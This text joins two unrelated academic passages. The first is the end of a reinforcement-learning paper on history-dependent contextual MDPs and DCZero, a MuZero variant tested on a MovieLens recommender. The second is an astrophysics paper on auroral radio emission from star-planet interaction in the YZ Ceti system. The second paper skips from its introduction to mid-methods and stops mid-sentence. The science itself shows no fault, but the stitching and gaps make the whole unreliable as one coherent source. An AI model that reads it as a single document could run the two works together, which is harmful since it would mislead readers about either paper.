\(\mathbf{CI}=[\mathbf{l},\mathbf{u}]\subseteq\mathbb{R}^{M+1}\times\mathbb{R}^{M+1}\) and assume that \(\mathbf{l}<\mathbf{u}\). Then, there exists \(t\in\mathcal{T}(\mathbf{Q})\) such that \(\mathbf{th}_{t}(\mathbf{Q},\mathbf{CI})\in\arg\max_{\mathbf{x}\in\mathbf{CI}}f(\mathbf{x})\)._ We can now leverage Lemma 5.6 to solve the inner maximization in Equation (8). For notational convenience, we write \(\bar{Q}_{i}=\bar{Q}_{i}(s,a,\mathbf{CI}_{h}^{k})\) and \(\mathbf{Q}=\left(Q_{1},\ldots,Q_{M+1}\right)^{T}\). Applying Lemma 5.6, we get that \[\max_{\bar{\mathbf{\sigma}}\in\mathbf{CI}_{h}^{k}}\sum_{i=1}^{M+1}z_{i}( \bar{\mathbf{\sigma}})\bar{Q}_{i}=\max_{t\in\mathcal{T}(\mathbf{Q})}\sum_{i=1}^{M+1}z _{i}\Big{(}\mathbf{th}_{t}\Big{(}\mathbf{Q},\mathbf{CI}_{h}^{k}\Big{)}\Big{)}\bar{Q}_{i}. \tag{9}\] As a result, the non-convex maximization problem in Equation (9) reduces the search space to \(M\) optimistic candidates. ### Putting It All Together Using Lemma 5.6 and particularly its derived corollary in Equation (9), we construct an optimistic planner, denoted by Optimistic DP, which plans via dynamic programming using Equation (9); we refer to Appendix F for an explicit formulation of the optimistic planner. Finally, using the tractable estimator \(\hat{\mathbf{f}}_{T}^{k}\), and the threshold optimistic planner, we present a tractable variant of LDC-UCB in Algorithm 2, for which we have the following regret guarantee. **Theorem 5.7**.: _Let \(\lambda=\Theta(\frac{HM^{2.5}SA}{L})\). With probability at least \(1-\delta\), the regret of Algorithm 2 is_ \[R(K)\leq\tilde{\mathcal{O}}\Big{(}\sqrt{H^{8}M^{6.5}S^{2}A^{2}L^{4}\kappa K} \Big{)}.\] The proof of the theorem can be found in Appendix D. As expected, the regret upper bound in Algorithm 2 is worse than that of Algorithm 1 by a factor of \(\tilde{\mathcal{O}}(HML)\). This result is strongly affected by the looser bound for the tractable feature maps in Lemma 5.2. Nevertheless, the intractability of Algorithm 1 compared to the tractability of Algorithm 2 suggests this is a more-than-reasonable tradeoff. Moreover, our tractable variant of LDC-UCB gives rise to practical optimistic algorithms, as we demonstrate next. ## 6 DCZero Motivated by our theoretical results, we present a practical model-based optimistic algorithm for solving DCMDPs. We build on MuZero (Schrittwieser et al., 2020), a recent model-based algorithm which constructs a model in latent space and acts using Monte Carlo Tree Search (MCTS, Coulom (2007)). MuZero uses representation, transition, and prediction networks for training and acting. The representation network first embeds observations in a latent space, after which planning takes place using the transition and prediction networks through a variant of MCTS. Importantly, instead of predicting the next state (e.g., using world models (Hafner et al., 2023)), MuZero trains its latent space by predicting three quantities--the reward, value, and current policy--by rolling out trajectories in latent space (see Schrittwieser et al. (2020) for further details). We develop DCZero, an algorithm based on MuZero for DCMDPs (see Algorithm 3). Like MuZero, DCZero uses representation, transition, and prediction networks to learn and act in the environment. In contrast to MuZero, DCZero trains an additional ensemble of networks to estimate the unknown features \(\mathbf{f}^{*}\) using cross-entropy. Estimated quantities of the ensemble are used to construct confidence intervals for the sufficient statistics, which are used to augment the state. DCZero uses \(M+1\) transition networks (one for each context), and predicts \(M+1\) reward functions. To incorporate optimism, the value function is trained optimistically using the thresholding technique in the previous section, where rewards for unseen actions are sampled from the trained reward models \(r_{i}\) and next states are sampled from the trained models \(P_{i}\). Movie Recommendation Environment.To evaluate the effectiveness of DCZero, we develop a movie recommendation environment based on the MovieLens dataset Harper and Konstan (2015). Users and items are represented in embedding space computed using SVD of the MovieLens ratings matrix. Each of \(n\) users is assigned a set of \(M\) possible user embeddings; i.e., each user \(u\in\left\{u^{(i)}\right\}_{i=1}^{n}\) is assigned a set of preference vectors \(\mathbf{x}=\left\{\mathbf{x}^{(j)}\right\}_{j=1}^{M+1},\mathbf{x}^{(j)}\in\mathbb{R}^{d}\). Intuitively, these vectors reflect distinct user preferences corresponding to some aspect of the user's latent state (e.g., mood or current interest Cen et al. (2020); location, companions, or activity; level of trust or satisfaction with the system) and hence influence \(u\)'s behavior. The recommendation agent interacting with a user selects an item \(x\) from a random set of \(A\) movies, \(\left\{\mathbf{v}^{(a)}\right\}_{a=1}^{A},\mathbf{v}^{(a)}\in\mathbb{R}^{d}\), and recommends it. The user context then evolves according to some history-dependent dynamics represented by a logistic DCMDP. Specifically, we assume unknown latent features \(\mathbf{f}^{*}(\mathbf{x},\mathbf{v})\) with the user's aggregated features (at time \(h\in[H]\), episode \(k\)) being: \(\mathbf{\sigma}_{k,h}=\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{f}^{*}(\mathbf{x}_{k}^{(j_{k} )},\mathbf{v}^{(a_{i})})\). The agent recommends movie \(\mathbf{v}^{(a)}\) to the user, while the user preference vector is sampled as \(\mathbf{x}_{k}^{j_{k}}\sim z(\mathbf{\sigma}_{k,h})\). The agent then receives a reward \(r_{j}(\mathbf{x},a)=(\mathbf{x}_{k}^{(j_{k})})^{T}\mathbf{\Sigma}\mathbf{v}^{(a)}\) reflecting the user's (current) preference for the movie, and the user's latent state transitions given the unknown function \(\mathbf{f}^{*}(\mathbf{x},\mathbf{v})\) and discount \(\alpha\); that is, \(\mathbf{\sigma}_{k,h+1}=\alpha\mathbf{\sigma}_{k,h}+\mathbf{f}^{*}(\mathbf{x}_{k}^{(j_{k})}, \mathbf{v}^{(a)})\). We test our methods in two variants of this environment. In the first, "AttractionEnv", user latent features \(\mathbf{f}^{*}\) are correlated with the user's degree of preference for the recommended movie: \[\mathbf{f}^{*}(\mathbf{x}^{(j)},\mathbf{v})=\mu\big{(}(\mathbf{x}^{(j)})^{T}\mathbf{\Sigma}\mathbf{v} \big{)},\] (Attraction) where \(\mu\) is a component-wise monotonically increasing function. AttractionEnv reflects users with a tendency to desire content similar to those they most recently consumed. This may reflect the positive influence of exposure to new types of content, increased familiarity increasing preference, or content domains (such as music) where some mild consistency of experience is preferred to jarring shifts in style or genre. The second environment, "NoveltyEnv", reflects a contrasting dynamics in which user latent features evolve such that \(\mathbf{f}^{*}\) is anti-correlated with the user's preference for the recommended movie: \[\mathbf{f}^{*}_{i}(\mathbf{x}^{(j)},\mathbf{v})=\begin{cases}-\mu\big{(}(\mathbf{x}^{(j)})^{T} \mathbf{\Sigma}\mathbf{v}\big{)}&,j=i\\ \mu\big{(}(\mathbf{x}^{(j)})^{T}\mathbf{\Sigma}\mathbf{v}\big{)}&,\text{o.w.}\end{cases}\] (Novelty) As a result, movies that previously appealed to the user become less preferred, reflecting a desire for novelty over short time periods. Experiments.All experiments used a horizon of \(H=300\), \(M=6\) user classes, \(A=6\) slate items (changing every reset), and a user embedding dimension of \(d=20\). We used default parameters for MuZero and applied the same parameters to DCZero. We compared DCZero and MuZero on the AttractionEnv and NoveltyEnv environments. We also tested a history-dependent variant of MuZero, which uses the sequence of past movies and contexts to densely represent history. More specifically, Hist-MuZero uses a stack of \(30\) previous observations as its state. We implemented both MLP and Transformer-based model architectures, but present results for the Transformer, as both had similar performance. Figure 2 shows these comparisons. The plots compare the return of DCZero with the two baselines on AttractionEnv and NoveltyEnv with \(\alpha=0.99\); we also vary the values of \(\alpha\) on the AttractionEnv. We see that DCZero is able to outperform both baselines, with significant increases in performance for larger values of \(\alpha\) (i.e., longer history dependence). This suggests that DCZero can be especially beneficial in problems that exhibit long history dependence. Interestingly, we note that using a dense history-dependent Transformer hurts performance, except for very small values of \(\alpha\) (indeed, only for \(\alpha=0.1\) does the sequence model outperform the other methods). ## 7 Related Work Our work is related to a range of research on contextual MDPs, partially observable environments, and termination-based reinforcement learning. Contextual MDPs.Contextual MDPsHallak et al. (2015) have proven useful in a numerous studies Jiang et al. (2017); Zintgraf et al. (2019); Kwon et al. (2021). Contexts are sampled once and are fixed throughout the episode. DCMDPs can be seen as a generalization of contextual MDPs, where contexts can change over time in a realistic, history-dependent fashion. Other forms of DCMDPs, are interesting directions for future work, including DCMDPs for which contexts change slowly in time. Partially Observable Environments.Partially observable MDPs are widely studied Papadimitriou and Tsitsiklis (1987); Vlassis et al. (2012); Krishnamurthy et al. (2016); Tennenholtz et al. (2020); Xiong et al. (2022). As POMDPs are inherently history dependent, recent work has identified models and assumptions for which sample-efficient algorithms can be derived Xiong et al. (2022); Liu et al. (2022); b). Nevertheless, such solutions are often computationally intractable, impeding their practical implementation. With DCMDPs, we focus on specific forms of history-dependence, and show them to be computationally tractable, as well as effectively deployable. Termination-based RL.Tennenholtz et al. (2022) define TerMDPs, a framework which models exogenous, non-Markovian termination in the environment. Once terminated, the agent stops acting and accrues no further rewards. TerMDPs capture various scenarios in which exogenous actors disengage with the agent (e.g., passengers in autonomous vehicles or users abandoning a recommender), and can be shown to be a special case of logistic DCMDPs (see Appendix B.2). As such, logistic DCMDPs support reasoning about optimizing more general contextual behavior, including: those involving notions of trust (e.g., where users become more or less receptive to agent recommendations); situations where humans override an agent for short periods; and modeling the effects of user satisfaction, moods, etc. ## 8 Discussion and Future Work In this work we presented DCMDPs, and logistic DCMDPs in particular--a general history-dependent contextual framework which admits sample and computationally efficient solutions. The aggregation structure of logistic DCMDPs gives rise to efficient estimation of the unknown feature maps. We provided regret guarantees and developed a tractable realization of LDC-UCB using a computational estimator and a novel planning procedure. Finally, we tested DCZero, a model-based implementation of LDC-UCB, demonstrating its efficacy on a recommendation benchmark. While logistic DCMDPs assume linear aggregations of past features, other variants with more complex parametric function classes over history are possible. Nevertheless, such complex function classes often require sample-inefficient techniques, suggesting that logistic DCMDPs may be especially well-suited to capturing extended, long history dependence. In particular, they admit sample and computationally efficient solutions, which can be implemented in practice. As future work, a hybrid approach which considers combining dense models (such as Transformers) for short-history dependence, and aggregated models (such as logistic DCMDPs) for very long history dependence, may offer the "best of both worlds" in practice. We leave this as an interesting direction for future work. Finally, this paper did not discuss solutions for partially observable contexts in logistic DCMDPs (where contexts are history dependent, yet unobserved). Such a setting requires additional assumptions, that are out-of-scope in this work. Nevertheless, our results can be used as building blocks for solving such latent logistic DCMDPs. Figure 2: Plots comparing MuZero, Hist-Muzero, and DCZero on the AttractionEnv(left) and NoveltyEnv (middle). We also compare results for different values of \(\alpha\) (right). All experiments show mean scores with 95% confidence intervals. ## Acknowledgements This project has received funding from the European Union's Horizon 2020 research and innovation programme under the Marie Sklodowska-Curie grant agreement No 101034255. Nadav Merlis is partially supported by the Viterbi Fellowship, Technion.
2305.00809
Star-Planet Interaction at radio wavelengths in YZ Ceti: Inferring planetary magnetic field
In exoplanetary systems, the interaction between the central star and the planet can trigger Auroral Radio Emission (ARE), due to the Electron Cyclotron Maser mechanism. The high brightness temperature of this emission makes it visible at large distances, opening new opportunities to study exoplanets and to search for favourable conditions for the development of extra-terrestrial life, as magnetic fields act as a shield that protects life against external particles and influences the evolution of the planetary atmospheres. In the last few years, we started an observational campaign to observe a sample of nearby M-type stars known to host exoplanets with the aim to detect ARE. We observed YZ Ceti with the upgraded Giant Metrewave Radio Telescope (uGMRT) in band 4 (550-900 MHz) nine times over a period of five months. We detected radio emission four times, two of which with high degree of circular polarization. With statistical considerations we exclude the possibility of flares due to stellar magnetic activity. Instead, when folding the detections to the orbital phase of the closest planet YZ Cet b, they are at positions where we would expect ARE due to star-planet interaction (SPI) in sub-Alfvenic regime. With a degree of confidence higher than 4.37 sigma, YZ Cet is the first extrasolar systems with confirmed SPI at radio wavelengths. Modelling the ARE, we estimate a magnetic field for the star of about 2.4 kG and we find that the planet must have a magnetosphere. The lower limit for the polar magnetic field of the planet is 0.4 G.
Corrado Trigilio, Ayan Biswas, Paolo Leto, Grazia Umana, Innocenza Busa, Francesco Cavallaro, Barnali Das, Poonam Chandra, Miguel Perez-Torres, Gregg A. Wade, Cristobal Bordiu, Carla S. Buemi, Filomena Bufano, Adriano Ingallinera, Sara Loru, Simone Riggi
2023-05-01T13:16:05Z
http://arxiv.org/abs/2305.00809v1
# Star-Planet Interaction at radio wavelengths in YZ Ceti: ###### Abstract In exoplanetary systems, the interaction between the central star and the planet can trigger Auroral Radio Emission (ARE), due to the Electron Cyclotron Maser mechanism. The high brightness temperature of this emission makes it visible at large distances, opening new opportunities to study exoplanets and to search for favourable conditions for the development of extra-terrestrial life, as magnetic fields act as a shield that protects life against external particles and influences the evolution of the planetary atmospheres. In the last few years, we started an observational campaign to observe a sample of nearby M-type stars known to host exoplanets with the aim to detect ARE. We observed YZ Ceti with the upgraded Giant Metrewave Radio Telescope (uGMRT) in band 4 (550--900 MHz) nine times over a period of five months. We detected radio emission four times, two of which with high degree of circular polarization. With statistical considerations we exclude the possibility of flares due to stellar magnetic activity. Instead, when folding the detections to the orbital phase of the closest planet YZ Ceti b, they are at positions where we would expect ARE due to star-planet interaction (SPI) in sub-Alfvenic regime. With a degree of confidence higher than \(4.37\,\sigma\), YZ Cet is the first extrasolar systems with confirmed SPI at radio wavelengths. Modelling the ARE, we estimate a magnetic field for the star of about \(2.4\,\mathrm{kG}\) and we find that the planet must have a magnetosphere. The lower limit for the polar magnetic field of the planet is \(0.4\,\mathrm{G}\). Star-planet interactions -- Astrophysical masers -- Radio interferometry -- M dwarf stars -- Stellar magnetic fields ## 1 Introduction The presence of magnetospheres surrounding terrestrial planets is believed to play an important role in the evolution of the planetary atmospheres and in the development of life (Griessmeier et al., 2005, 2016; Owen & Adams, 2014; McIntyre et al., 2019; Green et al., 2021). Magnetic fields act as a shield that prevents the arrival of ionized and potentially dangerous particles at the planetary surface (Shields et al., 2016; Garcia-Sage et al., 2017). This happened to the Earth, which has a magnetic field, and, among the planets in the habitable zone of the solar system, is the only one where life is known to have emerged. On the other hand, intense solar flares and coronal mass ejections (CME) may compress the planet's magnetosphere causing the opening of the polar cups and providing a free way for energetic particles to precipitate in the atmosphere (Airapetian et al., 2015, 2017), producing fixation of molecules, as nitrogen and carbon dioxide and, possibly, ingredients for the development of life. This may have happened in atmosphere of the young Earth (Airapetian et al., 2016). In this context, both planetary magnetospheres and stellar activity, with increasing ionizing radiation (UV, X-rays) (Lammer et al., 2012; Vidotto, 2022), play important roles in creating a favourable environment for the development of life. In addition, the presence of a magnetic field in planets gives the opportunity to infer important characteristics of their interiors as an indicator of internal dynamo (Lazio et al., 2019). The analysis of observations at radio wavelengths, which are sensitive to flares, associated energy releases and particles acceleration, is important to probe the interplanetary space in planetary systems other than the solar system. So far, many planets have been found around red and ultracool dwarfs, which constitute the most common stars in our Galaxy and are the majority of nearby stars. They possess long-lived, suitable conditions for the development of life in their planetary systems. Earth-sized planets, some of them in the habitability zone, have been detected orbiting cool stars, as for example in the case of Trappist-1 (Gillon et al., 2016, 2017), Proxima Cen (Anglada-Escude et al., 2016) and Teegarden's Star (Zechmeister et al., 2019). Aurorae are important manifestations of Star-Planet Interaction (SPI) in all the magnetized planets of the Solar System, detected as line emission in optical, UV and X-rays. These emissions are due to the precipitation of energetic charged particles of the solar wind in the planet's atmosphere around the polar magnetic caps. Moreover, the magnetic interaction with satellites in close orbit, as in the case of Jupiter and its Galilean moons, triggers particle acceleration that causes aurorae in the polar caps of the giant planet. At radio wavelengths, highly beamed, strongly polarized bursts are visible. They appear to originate from an annular region above the magnetic poles, associated to auroras in the atmosphere of Jupiter (e.g. Zarka, 1998). This is interpreted in terms of Electron Cyclotron Maser Emission (ECME) that originates in the magnetospheric auroral cavities, and is called Auroral Radio Emission (ARE). ## 2 Auroral Radio Emission The ECME is a coherent emission mechanism due to the gyro-resonance of an asymmetric population of electrons in velocity space. This can occur when electrons converging toward a central body, following the magnetic flux tubes, are reflected back by magnetic mirroring. Since electrons with small pitch angles penetrate deeper, they precipitate in the atmosphere of the central body, causing ultraviolet and optical auroras. This leads to a loss-cone anisotropy in the reflected electronic population, i.e. an inversion of population in velocity space, giving rise to maser emission. This amplifies the extraordinary magneto-ionic mode, producing almost 100% circularly polarized radiation at frequencies close to the first few harmonics of the local gyro-frequency (\(\nu_{\rm B}=2.8B\) MHz, with \(B\) in G). Locally, the amplified radiation is beamed in a thin _hollow cone_, whose axis in tangent to the local magnetic field line (_hollow cone model_) (Melrose and Dulk, 1982). ARE is also observed in single stars, as hot magnetic chemically peculiar stars (mCP) (e.g. Trigilio et al., 2000; Das et al., 2022; Leto et al., 2020), and in many very low mass stars and Ultra Cool Dwarfs (UCDs), with spectral type ranging from M8 to T6.5 (e.g. Berger et al., 2009; Hallinan et al., 2007; Route and Wolszczan, 2012; Lynch et al., 2015). Notwithstanding that they are located in very different regions of the Hertzsprung-Russell (HR) diagram, these stars have a common characteristic: a strong magnetic field, dominated by the dipole component, tilted with respect to the star's rotational axis. In mCP stars, where the magnetic topology is known, we observe two pulses at two rotational phases, close to the moments where the axis of the dipole lies in the plane of the sky. As the star rotates, the ECME produces a light-house effect, similar to pulsars. The same behaviour is observed in a few UCDs (Hallinan et al., 2007). In Solar system planets, the location of the origin of ECME, as in the case of the auroral kilometric radiation (AKR) of the Earth (Mutel et al., 2008), is the same as that derived from observations of stars, i.e. at a height of about \(0.1-2\) stellar radii above the poles, tangent to annular rings of constant B. This is in agreement with the _tangent plane beaming model_(Trigilio et al., 2011). This pattern of emission can occur when it originates in all points of the annular ring, each of them with a hollow cone pattern, and the overall emission is the sum of the emission from each ring; in the tangential direction the radiation is intensified. On the contrary, the _hollow cone model_ seems more adequate when the maser acts only in a small portion of the annular ring, corresponding to the flux tube connecting the planet, and the emission pattern is the natural hollow-cone. This pattern explains the ARE in most Solar system planets and is invoked to explain the radio emission arising from exo-planets. However, for both models, ARE is foreseen to appear in symmetric orbital position of the planet with respect to the line of sight. There are two kinds of ARE due to the interaction between our Sun and planets, which are believed to also act in exoplanetary systems. The first is due to the ram pressure of the wind of the star on the magnetosphere of the planet. In this case the frequency of the ECME is proportional to the magnetic field strength of the planet (\(B_{\rm planet}\)) for which any detection of ARE provides a direct measurement. However, since \(B_{\rm planet}\) is expected to be of the order of a few gauss, the frequency of the maser is expected to fall at the edge, or below, the ionospheric boundary of the radio window. In fact, the search for this emission gives basically negative results (e.g. Bastian et al., 2000; Ryabov et al., 2004; Hallinan et al., 2007; Lecavelier des Etangs et al., 2013; Sirothia et al., 2014). The second kind is due to the interaction of the orbiting planet with the magnetosphere of the parent star. This case is analogous to the system of Jupiter and its moons. At the present, there are some possible detections of this kind of ARE. The observed features in the time-frequency domain of the stellar ARE from the M8.5-type star TVLM 513-46546 (Hallinan et al., 2007; Lynch et al., 2015) were explained as a signature of an external body orbiting around this UCD. This possibility is supported by a model developed by Leto et al. (2017). Vedantham et al. (2020) claimed the detection of ARE from GJ 1151, an M4.5V star at 8.04 pc, by comparing two observations made during the LOFAR Two-Metre Sky Survey (LoTSS, Tasse et al., 2021). They detected Stokes V on one epoch, suggesting a possible SPI between the star and a hypothetical planet in close orbit. Indeed, Mahadevan et al. (2021) report the possibility of a planet of 2-day orbit, but Perger et al. (2021) ruled out this hypothesis with accurate radial velocity measurements. Similarly, Davis et al. (2021) report possible ARE in the dMe6 star WX UMa by comparing three observations of the LoTSS survey. However, none of these observations demonstrate that this ECME is due to SPI, since no planets have been found around these stars. The only successful way to associate ECME with SPI is to observe stars with confirmed planets for which orbital parameters are known, looking for a correlation of any detected ECME with the orbital phase or with periodicity in the radio emission different form the rotation rate of the star. This has been attempted by Trigilio et al. (2018) who observed \(\alpha\) Cen B with the aim to detect ARE from \(\alpha\) Cen Bb, (Dumusque et al., 2012). However, no detection has been reported; moreover, in this case the presence of a planet was ruled out (Rajpaul et al., 2016). The most evident case of ARE from SPI is that of the Proxima Cen - Proxima Cen b system, which was observed by Perez-Torres et al. (2021) in the 1-3 GHz band with the Australia Telescope Compact Array (ATCA) in 2017 for 17 consecutive days (spanning \(\sim\)1.6 orbital periods). They detected circularly polarized radio emission at 1.6 GHz at most epochs, a frequency consistent with the expected electron-cyclotron frequency for the known star's magnetic field intensity of \(\sim\)600 gauss (Reiners and Basri, 2008). Based on the 1.6 GHz ATCA light curve behavior, which showed an strongly circularly polarized emission pattern that correlated with the orbital period of the planet Proxima b, Perez-Torres et al. (2021) found evidence for auroral radio emission arising from the interaction between the planet Proxima b and its host star Proxima. With the aim to search for additional robust detections of ARE due to SPI, we started an observational campaign with several radio interferometers. The targets are nearby exoplanetary systems around late-type stars with planets in close orbit. In this Letter, we report the results of one of these campaigns, carried out with the uGMRT, which resulted in the detection of highly-polarized radio emission from YZ Ceti, which is consistent with ARE due to SPI between the planet YZ Ceti b and its host star. ## 3 YZ Ceti YZ Cet (GJ 54.1, 2MASS J01123052-1659570) is an M4.5V type star with a mass \(M_{*}=0.14\,M_{\odot}\) and a radius \(R_{*}=0.157\,R_{\odot}\)(Stock et al., 2020), at a distance of 3.71 pc (Gaia Collaboration et al., 2018), hosting an ultra-compact planetary system. At the present time, three Earth-mass planets have been discovered with the radial velocity (RV) method (Astudillo-Defru et al., 2017), namely YZ Cet b, c, d with orbital periods \(P_{\rm orb}=2.02,3.06,4.66\) days and semi-major axes \(r_{\rm orb}=0.016,0.022,0.028\) au, respectively (Stock et al., 2020), corresponding to \(21.9,30.1,38.3\,R_{*}\). No planetary transits have been observed for the YZ Cet system. For this reason the radii of the planets are not measured, but there is an estimate of \(R_{\rm b}=0.93\), \(R_{\rm c}=1.05\) and \(R_{\rm d}=1.04\,R_{\oplus}\) from a semi-empirical mass-radius relationship (Stock et al., 2020). YZ Cet is a mid-M type star classified as an eruptive variable. Stars of this spectral type tend to have strong, kG, axisymmetric dipolar field topologies (Kochukhov and Lavail, 2017, and references therein). YZ Cet is a slow rotator, with a period \(P_{\rm rot}=68\) days (Stock et al., 2020) and an age of 3.8 Gyr (Engle and Guinan, 2017) and from the activity indicator, based of the H&K CaII UV lines, \(\log R^{{}^{\prime}}_{\rm HK}=-4.87\) we deduce that it has a low activity level (Henry et al., 1996). The coronal X-ray luminosity determined from two ROSAT measurements is Lx\(\approx 10^{27.1}\) erg s\({}^{-1}\) similar to the solar value (Lx\({}_{\odot}\approx 10^{26.8}-10^{27.3}\) erg s\({}^{-1}\), Judge et al., 2003). From the Guedel Benz relation (Guedel and Benz, 1993), coupling X-ray and spectral radio luminosities in stars (Lx\(\approx\)Lr\({}_{\nu}\times 10^{15.5}\)), we can estimate the basal radio luminosity of YZ Cet (Lr\(\approx 10^{11.6}\) erg s\({}^{-1}\)Hz\({}^{-1}\)) and, assuming a distance of 3.71 pc, a basal radio flux density of \(S_{\nu}\approx 25\,\mu\)Jy. YZ Cet was observed several times at radio wavelengths, from 843 to 4880 MHz (Wendker, 1995; McLean et al., 2012), but never detected. Vidotto et al. (2019) assert that YZ Cet b could give detectable ARE, due to interaction of the stellar wind with the planet's magnetosphere, but at MHz frequencies. Very recently1, Pineda & Villadsen (2023), observed YZ Cet with the VLA at 2-4 GHz in five days, from Nov 2019 to Feb 2020. They detected two coherent bursts with an high degree of circular polarization, modeling their results as due to ARE from SPI, but not excluding the possibility of flares due to stellar magnetic activity. Footnote 1: after this paper was initially submitted in prep.). The scripts use the CASA task 'flagdata' and automatic flagging algorithm 'tfcrop' to remove radio frequency interference (RFI). The central baselines were treated with extra precaution to improve data quality. The calibration process was done in several iterations with conservative flagging to reduce the amount of flagged data. In the first step, the calibration solutions were applied to the flux calibrator only, and the calibrated data were flagged using another automatic RFI excluding algorithm 'rflag'. Although initially, a wider band of data was taken for analysis according to the data quality, after the first iteration, only a fixed final bandwidth of 265 MHz was used. In consecutive iterations, new calibration solutions were applied to the phase calibrators and the target, respectively. At each step, minimum signal-to-noise for calibration steps and flagging parameters were changed. This method improved the calibration, while keeping the flagging percentage as low as possible. Averaging in the frequency space on the final data were performed to obtain a final spectral resolution of 0.78 MHz. All the imaging were done using CASA task 'tclean', with deconvolver'mtmfs' (Multiscale Multi-frequency with W-projection, Rau and Cornwell, 2011). Several rounds of phase self-calibration steps were performed to improve the imaging results using the 'gaincal' & 'tclean' tasks. To remove the strong imaging artefacts created by bright sources near the phase centre, some of the nearby bright sources were removed from the visibility plane. This was done by subtracting the model visibilities of those corresponding bright nearby sources using task 'uvsub'. Finally, several rounds of phase-only and two rounds of amplitude and phase (A & P)-type self-calibration were performed to get the final radio image. Analysis of the maps has been carried out using the task imfit to measure the integrated flux density of the source assuming a two-dimensional Gaussian and imstat for the evaluation of the RMS of the maps near the target. Stokes I data were analysed for all the days of observations, whereas Stokes V data were analysed only in the case of detection. Results of the analysis are provided in Table 2. ## 5 Results YZ Cet has been detected four days out of nine, namely days 3, 4, 5 and 6 (Table 1). Stokes I is between 290 and 1070 \(\mu\)Jy, more than 5 \(\sigma\) for the lowest emission that occurs on day 4. Stokes V is reported only on days 5 and 6, with positive values on both days2, and with a very high percentage of circular polarization, 93% and 75% respectively. The highly circularly polarized radio emission in days 5 and 6 is consistent with the ECME. Footnote 2: The uGMRT sign convention in band 4 for defining right and left circular polarization is opposite to the IAU/IEEE convention (Das et al., 2020). We have taken this fact into account in our post-processing of the uGMRT data so that the convention used in this work is the same as the IAU/IEEE convention for circular polarization In order to investigate the presence of SPI, the Stokes I flux densities have been folded with the orbital periods of the three known planets. We used the ephemeris provided by Stock et al. (2020) that, for planet b, are: Figure 4: Spectra of the circularly polarized component of ARE in the two days of detection. The spectrum is increasing towards high frequency, indication that the high frequency cutoff is beyond the limits of the figure. Figure 3: Light-curve of the circularly polarized component of ARE in the two days of detection, folded to the orbital period of planet b. \(HJD=2452996.25\) and \(P_{\rm orb}=2.02087\) days. While for planet c and d, detections and non detections are randomly mixed around the orbits, for planet b the phases corresponding to detections appear in two groups, approximately between phases 0.07-0.2 and 0.78-0.9. The two intervals are marked as light blue areas in Fig. 1, and the corresponding orbital positions are shown in Fig. 2. A deeper analysis has been carried out in Stokes V for the two days of detection. We computed a spectrogram of the emission by performing the Discrete Fourier Transform (DFT) of the complex visibilities at the position of the star as a function of time and frequency channels. This analysis was carried out only for Stokes V since there are no other sources in the field, while in Stokes I this analysis suffers from the presence of sidelobes of other sources at the position of the target. The dynamical spectra do not show any notable structures. We then obtained light curves by averaging first over the whole bandwidth and then with a time resolution of 4 minutes. These are shown in Fig. 3, where time is converted into orbital phase. During Day 6 the temporal behaviour of Stokes V is a little noisier with respect to that of day 5, and does not show any particular trend. During day 5 it is possible to appreciate a decrease of emission at a middle of the observation, demonstrating that the emission is likely not constant even on short timescales (\(\lessapprox 1\) hour). We also obtained in-band spectra for days 5 and 6 by averaging first in the whole time-range and then with a resolution of 33 MHz. In-band spectra are shown in Fig. 4. During day 5 the flux density increases in the first part of the band (\(550-650\) MHz) then it is almost flat. During day 6 it increases on average, indicating that the spectrum probably extends to higher frequencies, with a possible cutoff at more than 1 GHz. For both days, the steep increase of the flux density seems to point to a minimum frequency of about 500 MHz, which could indicate a low limit of the ECME. ## 6 Discussion ### Is the emission really due to SPI? The orbital phases of the four detections define two sectors (blue areas in Fig.1 and 2) that are symmetric with respect to the line of sight. The two sectors cover \(\pm\)(30\({}^{\circ}\) to 80\({}^{\circ}\)), with a total of 100\({}^{\circ}\) over 360\({}^{\circ}\). This symmetry strongly suggests that we are detecting ARE due to SPI in the magnetosphere of the star due to sub-Alfvenic interaction with planet b, that can be explained in the framework of the hollow cone model. However, other emission mechanisms observed in M type stars could be responsible for the observed emission. The radio emission from active M stars is highly variable and is characterized by the presence of two kinds of flares superimposed to a quiescent radio emission. Incoherent flares are transient increases of radio flux, usually weakly circularly polarized, with timescales of order of hours, modelled within the framework of gyrosynchrotron emission from mildly relativistic electrons (Osten et al., 2005). The other kind of flares are coherent radio bursts, characterized by high level of circular polarization (Villadsen & Hallinan, 2019) and timescales from seconds to hours. These characteristics are interpreted as ECME (Lynch et al., 2015; Zic et al., 2019). At these days, the rate of coherent bursts in M type stars is still unknown. Only for the most active, fast rotating M type dwarfs, as AD Leo, UV Cet, EQ Peg, EV Lac and YZ Cmi, Villadsen & Hallinan (2019) have been able to estimate a rate of 20% to catch a coherent burst at the same frequency of our observations. On the other hand, from a blind sky survey at low frequency (\(\leq 200\) MHz) Callingham et al. (2021) found a low rate of detection of coherent emission in M type stars, about 0.5%. This emission seems to be uncorrelated with the activity indicators while, at GHz frequency, there is a correlation with the Rossby number (McLean et al., 2012), i.e. with the magnetic activity. On the other hand, incoherent flares due to gyrosynchrotron emission have no suitable statistics for M type stars. In any case, whatever the probability \(p\) of flares or coherent bursts, the overall probability to get 4 detections inside the two sectors and other 5 non detections outside them is given by \(p^{4}(1-p)^{5}\) which has a maximum around \(2\times 10^{-3}\). This is a very low probability. This occur when \(p=0.44\), which is a very high flare rate, Figure 5: Schematic view of the magnetic connection between star and planet. The stellar dipole is assumed to be perpendicular to the orbital plane. The axes of the ECME cones are tangent to the dipole line (angle \(\psi\) to the dipole axis). The aperture of the cone is \(\theta\) with thickness \(\Delta\theta\), centered in O. not suitable for the activity of YZ Cet. The two coherent burst reported by Pineda and Villadsen (2023) can be used as a test. Phasing their data with the ephemeris we used, we get that their two detections occur at phase 0.13 and 0.09 (Epochs 2 and 5), which fall inside our sector; the non detections at phase 0.63, 0.62 and 0.76 (Epochs 1,3 and 4), which are outside our sectors. Considering all the data, 6 inside the sectors, and 8 outside, we get that the probability that flares or coherent bursts fall in this configuration is given by \(P_{\rm tot}=p^{6}(1-p)^{8}\), which has a maximum of \(7\times 10^{-5}\), corresponding to \(4.37\,\sigma\), for \(p=0.43\). We can conclude that the observed emission is ARE from SPI, with a degree of confidence of \((1-\max(P_{\rm tot}))\), i.e. 99.992%. ### Sub-Alfvenic regime The perturbation caused by the planet crossing the stellar magnetosphere can propagate towards the star if the relative velocity \(v_{\rm rel}\) (see sect. 6.5) of the planet with respect to the magnetosphere is less than the Alfven velocity, given by \(v_{\rm Alf}=B/\sqrt{4\pi\rho_{\rm w}}\), where \(\rho_{\rm w}\) is the density of the 